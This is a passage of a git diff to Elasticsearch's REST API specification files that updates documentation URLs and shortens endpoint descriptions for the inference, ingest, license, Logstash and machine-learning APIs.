"description": "Create an Google AI Studio inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googlevertexai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googlevertexai.json index 6068d4cbc91ba..6dd400f4d1730 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googlevertexai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googlevertexai.json @@ -1,8 +1,8 @@ { "inference.put_googlevertexai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-google-vertex-ai.html", - "description": "Configure a Google Vertex AI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-googlevertexai", + "description": "Create a Google Vertex AI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_hugging_face.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_hugging_face.json index 76965d61ba839..c0fa9aa65ab01 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_hugging_face.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_hugging_face.json @@ -1,8 +1,8 @@ { "inference.put_hugging_face": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-hugging-face.html", - "description": "Configure a HuggingFace inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-hugging-face", + "description": "Create a Hugging Face inference endpoint" }, "stability": "stable", "visibility": "public", diff --git 
a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_jinaai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_jinaai.json index 80af2a69c9f1c..5d4e8e271924c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_jinaai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_jinaai.json @@ -1,8 +1,8 @@ { "inference.put_jinaai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-jinaai.html", - "description": "Configure a JinaAI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-jinaai", + "description": "Create an JinaAI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_mistral.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_mistral.json index 97633b233ce83..2738bf4a90e05 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_mistral.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_mistral.json @@ -1,8 +1,8 @@ { "inference.put_mistral": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-mistral.html", - "description": "Configure a Mistral inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-mistral", + "description": "Create a Mistral inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_openai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_openai.json index 5405206c8cacc..85f14dd206c1a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_openai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_openai.json @@ -1,8 +1,8 @@ { "inference.put_openai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-openai.html", - "description": "Configure an OpenAI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-openai", + "description": "Create an OpenAI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_voyageai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_voyageai.json index 79a1016560f1a..00af79bed8742 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_voyageai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_voyageai.json @@ -1,8 +1,8 @@ { "inference.put_voyageai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/inference-apis.html", - "description": "Configure a VoyageAI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-voyageai", + "description": "Create a VoyageAI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_watsonx.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_watsonx.json index db5a42d504b7a..80f9a01ae8571 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_watsonx.json +++ 
b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_watsonx.json @@ -1,8 +1,8 @@ { "inference.put_watsonx": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-watsonx-ai.html", - "description": "Configure a Watsonx inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-watsonx", + "description": "Create a Watsonx inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.rerank.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.rerank.json index c08a51a8b9b98..797f315970ee4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.rerank.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.rerank.json @@ -1,8 +1,8 @@ { "inference.rerank": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform reranking inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform reranking inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.sparse_embedding.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.sparse_embedding.json index 90ebb6e6dc4c2..61bfbde36d579 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.sparse_embedding.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.sparse_embedding.json @@ -1,8 +1,8 @@ { "inference.sparse_embedding": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform sparse embedding inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform sparse embedding inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.stream_completion.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.stream_completion.json index b4eddb1641233..6dfd2bc1c7d9c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.stream_completion.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.stream_completion.json @@ -1,8 +1,8 @@ { "inference.stream_completion": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-stream-inference-api.html", - "description": "Perform streaming completion inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-stream-inference", + "description": "Perform streaming inference" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.text_embedding.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.text_embedding.json index 309a1d80b7416..aadf35f009f19 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.text_embedding.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.text_embedding.json @@ -1,8 +1,8 @@ { "inference.text_embedding": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - 
"description": "Perform text embedding inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform text embedding inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.update.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.update.json index 133354e3ec5be..2772c50e893ff 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.update.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.update.json @@ -1,8 +1,8 @@ { "inference.update": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-inference-api.html", - "description": "Update inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-update", + "description": "Update an inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/info.json index 286a06f73671d..d74881f7efef0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/info.json @@ -1,8 +1,8 @@ { "info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Returns basic information about the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-info", + "description":"Get cluster info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_geoip_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_geoip_database.json index f76d328836d90..f5bcf037cf515 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_geoip_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_geoip_database.json @@ -1,8 +1,8 @@ { "ingest.delete_geoip_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-geoip-database-api.html", - "description":"Deletes a geoip database configuration" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-geoip-database", + "description":"Delete GeoIP database configurations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_ip_location_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_ip_location_database.json index 341ff5081e270..c6993291ba033 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_ip_location_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_ip_location_database.json @@ -1,8 +1,8 @@ { "ingest.delete_ip_location_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-ip-location-database-api.html", - "description":"Deletes an ip location database configuration" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-ip-location-database", + "description":"Delete IP geolocation database configurations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_pipeline.json 
b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_pipeline.json index a1f6c0f72732a..82381a9d0299e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_pipeline.json @@ -1,8 +1,8 @@ { "ingest.delete_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-pipeline-api.html", - "description":"Deletes a pipeline." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-pipeline", + "description":"Delete pipelines" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.geo_ip_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.geo_ip_stats.json index 1013d7dc6fc5e..e577a5622bfd3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.geo_ip_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.geo_ip_stats.json @@ -1,8 +1,8 @@ { "ingest.geo_ip_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/geoip-stats-api.html", - "description": "Returns statistical information about geoip databases" + "url": "https://www.elastic.co/docs/reference/enrich-processor/geoip-processor", + "description": "Get GeoIP statistics" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_geoip_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_geoip_database.json index 5c59994d4b22e..a73a59150a0ff 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_geoip_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_geoip_database.json @@ -1,8 +1,8 @@ { "ingest.get_geoip_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-geoip-database-api.html", - "description":"Returns geoip database configuration." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-get-geoip-database", + "description":"Get GeoIP database configurations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_ip_location_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_ip_location_database.json index a2e42fe6c8e59..d05595a4efe8b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_ip_location_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_ip_location_database.json @@ -1,8 +1,8 @@ { "ingest.get_ip_location_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-ip-location-database-api.html", - "description":"Returns the specified ip location database configuration" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-get-ip-location-database", + "description":"Get IP geolocation database configurations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_pipeline.json index d6d408eafb85b..639821f8f2416 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_pipeline.json @@ -1,8 +1,8 @@ { "ingest.get_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-pipeline-api.html", - "description":"Returns a pipeline." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-get-pipeline", + "description":"Get pipelines" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.processor_grok.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.processor_grok.json index e150d95343729..cd74e44ad4d90 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.processor_grok.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.processor_grok.json @@ -1,8 +1,8 @@ { "ingest.processor_grok":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/grok-processor.html#grok-processor-rest-get", - "description":"Returns a list of the built-in patterns." 
+ "url":"https://www.elastic.co/docs/reference/enrich-processor/grok-processor", + "description":"Run a grok processor" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_geoip_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_geoip_database.json index 9c2677d1f7b2f..7bab03d14a4f1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_geoip_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_geoip_database.json @@ -1,8 +1,8 @@ { "ingest.put_geoip_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/put-geoip-database-api.html", - "description":"Puts the configuration for a geoip database to be downloaded" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-put-geoip-database", + "description":"Create or update a GeoIP database configuration" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_ip_location_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_ip_location_database.json index 782048b98160a..e98cae991b729 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_ip_location_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_ip_location_database.json @@ -1,8 +1,8 @@ { "ingest.put_ip_location_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/put-ip-location-database-api.html", - "description":"Puts the configuration for a ip location database to be downloaded" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-put-ip-location-database", + "description":"Create or update an IP geolocation database configuration" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_pipeline.json index f74fbfbcc4d06..07d5dadf92e29 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_pipeline.json @@ -1,8 +1,8 @@ { "ingest.put_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/put-pipeline-api.html", - "description":"Creates or updates a pipeline." + "url":"https://www.elastic.co/docs/manage-data/ingest/transform-enrich/ingest-pipelines", + "description":"Create or update a pipeline" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.simulate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.simulate.json index 04b704646d28f..dfa2aa98247f4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.simulate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.simulate.json @@ -1,8 +1,8 @@ { "ingest.simulate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/simulate-pipeline-api.html", - "description":"Allows to simulate a pipeline with example documents." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-simulate", + "description":"Simulate a pipeline" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/knn_search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/knn_search.json index 6faee49d480be..4fb20b686794c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/knn_search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/knn_search.json @@ -1,8 +1,8 @@ { "knn_search":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-search.html", - "description":"Performs a kNN search." + "url":null, + "description":"Performs a kNN search" }, "stability":"experimental", "deprecated" : { diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.delete.json index 5b32a8b9fc6ff..c79d487fdc3f4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.delete.json @@ -1,8 +1,8 @@ { "license.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-license.html", - "description":"Deletes licensing information for the cluster" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-delete", + "description":"Delete the license" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get.json index 16f2c086f3d3d..4d8a0cc423196 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get.json @@ -1,8 +1,8 @@ { "license.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-license.html", - "description":"Retrieves licensing information for the cluster" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get", + "description":"Get license information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_basic_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_basic_status.json index a689daf4fe88a..a7fa72c5a694b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_basic_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_basic_status.json @@ -1,8 +1,8 @@ { "license.get_basic_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-basic-status.html", - "description":"Retrieves information about the status of the basic license." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get-basic-status", + "description":"Get the basic license status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_trial_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_trial_status.json index dffa2932a17f9..be3dcb6ef82a0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_trial_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_trial_status.json @@ -1,8 +1,8 @@ { "license.get_trial_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-trial-status.html", - "description":"Retrieves information about the status of the trial license." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get-trial-status", + "description":"Get the trial status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post.json index 25c3093fb0da9..e044bf8012856 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post.json @@ -1,8 +1,8 @@ { "license.post":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/update-license.html", - "description":"Updates the license for the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post", + "description":"Update the license" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_basic.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_basic.json index a0e6776bdbb32..4677cedc39db3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_basic.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_basic.json @@ -1,8 +1,8 @@ { "license.post_start_basic":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/start-basic.html", - "description":"Starts an indefinite basic license." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post-start-basic", + "description":"Start a basic license" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_trial.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_trial.json index 9fb85807d611f..406e11e5e1eb1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_trial.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_trial.json @@ -1,8 +1,8 @@ { "license.post_start_trial":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trial.html", - "description":"starts a limited time trial license." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post-start-trial", + "description":"Start a trial" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.delete_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.delete_pipeline.json index 8650f5f7cac3c..7434e4a168ff7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.delete_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.delete_pipeline.json @@ -1,8 +1,8 @@ { "logstash.delete_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/logstash-api-delete-pipeline.html", - "description":"Deletes Logstash Pipelines used by Central Management" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-delete-pipeline", + "description":"Delete a Logstash pipeline" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.get_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.get_pipeline.json index 201721268588a..7c41efdc27fa9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.get_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.get_pipeline.json @@ -1,8 +1,8 @@ { "logstash.get_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/logstash-api-get-pipeline.html", - "description":"Retrieves Logstash Pipelines used by Central Management" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-get-pipeline", + "description":"Get Logstash pipelines" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.put_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.put_pipeline.json index e8ec9b0d99178..936b0728a7aa7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.put_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.put_pipeline.json @@ -1,8 +1,8 @@ { "logstash.put_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/logstash-api-put-pipeline.html", - "description":"Adds and updates Logstash Pipelines used for Central Management" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-put-pipeline", + "description":"Create or update a Logstash pipeline" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/mget.json b/rest-api-spec/src/main/resources/rest-api-spec/api/mget.json index 28542bd91a7cb..dafc12b278247 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/mget.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/mget.json @@ -1,8 +1,8 @@ { "mget":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-multi-get.html", - "description":"Allows to get multiple documents in one request." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-mget", + "description":"Get multiple documents" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.deprecations.json b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.deprecations.json index 6906cacc2bdaf..a98913ee69cdb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.deprecations.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.deprecations.json @@ -1,8 +1,8 @@ { "migration.deprecations":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/migration-api-deprecation.html", - "description":"Retrieves information about different cluster, node, and index level settings that use deprecated features that will be removed or changed in the next major version." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-deprecations", + "description":"Get deprecation information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.get_feature_upgrade_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.get_feature_upgrade_status.json index 27e142c6f3462..f4a7e2fa1fe65 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.get_feature_upgrade_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.get_feature_upgrade_status.json @@ -1,8 +1,8 @@ { "migration.get_feature_upgrade_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/migration-api-feature-upgrade.html", - "description":"Find out whether system features need to be upgraded or not" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-get-feature-upgrade-status", + "description":"Get feature migration information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.post_feature_upgrade.json b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.post_feature_upgrade.json index 6bafdfc69fde7..2bc5066b7a0ee 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.post_feature_upgrade.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.post_feature_upgrade.json @@ -1,8 +1,8 @@ { "migration.post_feature_upgrade":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/migration-api-feature-upgrade.html", - "description":"Begin upgrades for system features" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-get-feature-upgrade-status", + "description":"Start the feature migration" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.clear_trained_model_deployment_cache.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.clear_trained_model_deployment_cache.json index 81f396a30b366..c68e43fb70df5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.clear_trained_model_deployment_cache.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.clear_trained_model_deployment_cache.json @@ -1,8 +1,8 @@ { "ml.clear_trained_model_deployment_cache":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/clear-trained-model-deployment-cache.html", - 
